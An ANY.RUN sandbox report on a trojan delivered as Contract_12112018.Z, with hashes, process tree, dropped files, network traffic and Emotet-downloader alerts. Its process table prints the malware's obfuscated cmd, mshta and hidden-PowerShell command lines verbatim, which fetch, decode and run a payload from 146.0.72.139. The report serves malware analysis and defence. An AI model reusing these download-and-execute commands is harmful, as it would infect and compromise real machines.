analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Contract_12112018.Z

Full analysis: https://app.any.run/tasks/47e47235-0663-44e9-b1ea-a03fea4b78be
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 14:02:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/x-compress
File info: compress'd data 16 bits
MD5:

14206BCD93B1089AFE4953B6D1DD1F10

SHA1:

271E40FEF23C2666EA87E07B3514507ED85F7B2C

SHA256:

A1273A0A14BC7461C6F8F62C53EFBEB31B1321DEF57204DFB3D29799A6A415B1

SSDEEP:

192:zj8BKuS/l080zrzVKSVMxUfbtbx7tq5j2/KazXrH52:zjsglj0PZbtbx7tq5wFbT52

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • cmd.exe (PID: 3516)
      • cmd.exe (PID: 3608)
      • pphephf.com (PID: 2620)
      • ppheph.com (PID: 3280)
      • pphephff.com (PID: 2104)
      • pphephff.com (PID: 3612)
      • cmd.exe (PID: 3584)
    • Changes the autorun value in the registry

      • ppheph.com (PID: 3280)
  • SUSPICIOUS

    • Reads internet explorer settings

      • hh.exe (PID: 3596)
    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 3596)
      • mshta.exe (PID: 3440)
      • ppheph.com (PID: 3280)
    • Starts application with an unusual extension

      • cmd.exe (PID: 3608)
      • pphephff.com (PID: 3612)
      • pphephf.com (PID: 2620)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3516)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3608)
      • pphephf.com (PID: 2620)
      • ppheph.com (PID: 3280)
    • Creates files in the user directory

      • ppheph.com (PID: 3280)
    • Creates files in the program directory

      • cmd.exe (PID: 3584)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3584)
  • INFO

    • Reads Microsoft Office registry keys

      • iexplore.exe (PID: 648)
    • Changes internet zones settings

      • iexplore.exe (PID: 648)
    • Reads internet explorer settings

      • iexplore.exe (PID: 124)
      • mshta.exe (PID: 3440)
    • Application launched itself

      • iexplore.exe (PID: 648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.z | UNIX Compressed data (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
13
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start winrar.exe no specs iexplore.exe iexplore.exe no specs hh.exe no specs cmd.exe no specs mshta.exe cmd.exe pphephff.com no specs pphephff.com no specs pphephf.com ppheph.com cmd.exe no specs systeminfo.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3032"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Contract_12112018.Z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
648"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\Desktop\Contract_12112018.mhtC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
124"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:648 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3596"C:\Windows\hh.exe" C:\Users\admin\Desktop\Contract_12112018.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3516"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,, ,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3440mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3608"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\pphephff.com && C:\Users\admin\AppData\Local\Temp\\pphephff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\pphephf.com& C:\Users\admin\AppData\Local\Temp\\pphephff.com /c C:\Users\admin\AppData\Local\Temp\\pphephf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\ppheph.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\ppheph.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\ppheph.com $sv; C:\Users\admin\AppData\Local\Temp\\ppheph.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2104C:\Users\admin\AppData\Local\Temp\\pphephff.com /c C:\Users\admin\AppData\Local\Temp\pphephff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3612C:\Users\admin\AppData\Local\Temp\\pphephff.com /c C:\Users\admin\AppData\Local\Temp\\pphephf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\ppheph.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\ppheph.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\ppheph.com $sv; C:\Users\admin\AppData\Local\Temp\\ppheph.com;C:\Users\admin\AppData\Local\Temp\pphephff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2620C:\Users\admin\AppData\Local\Temp\\pphephf.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\ppheph.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\ppheph.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\ppheph.com $sv; C:\Users\admin\AppData\Local\Temp\\ppheph.com;C:\Users\admin\AppData\Local\Temp\pphephf.com
pphephff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 259
Read events
1 116
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
3032WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3032.9435\Contract_12112018
MD5:
SHA256:
648iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
648iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2620pphephf.comC:\Users\admin\AppData\Local\Temp\ppheph.txttext
MD5:53F4A016A61040273478E1C3C10FF8A3
SHA256:9FB4281BC5994209DCED167E4D34BFEDF3B8A6F882B1A7C92F30970DB5E30548
124iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\wbkDBF5.tmpbinary
MD5:FDA367ED37AAB34E31F3021DCDF58BD1
SHA256:57EB6CB654352C5C12F67336F44D03942F5653ABBDC376A7C92CF343586E4E0E
3440mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\li[1]html
MD5:D0FA1AB050BEDE3522650FAA54BBAB2D
SHA256:9D10F123C6252C7DB2BE34176B5D76101286DBABC976AD9E0A2493D5D7559295
2620pphephf.comC:\Users\admin\AppData\Local\Temp\ppheph.comexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
3584cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:D862FC5F5AD9B53C091F32DBC2E0A1DD
SHA256:D6CEF87997BB8FF7797A51699793C851DFB27E1AC36D9EDD288B2C9518DF7F3A
3280ppheph.comC:\Users\admin\AppData\Roaming\conhost.exe 1C9B74E8.exeexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
648iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[3].pngimage
MD5:9FB559A691078558E77D6848202F6541
SHA256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2620
pphephf.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
3440
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
648
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
648
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2620
pphephf.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious
3440
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted

Threats

PID
Process
Class
Message
2620
pphephf.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2620
pphephf.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
2620
pphephf.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
No debug info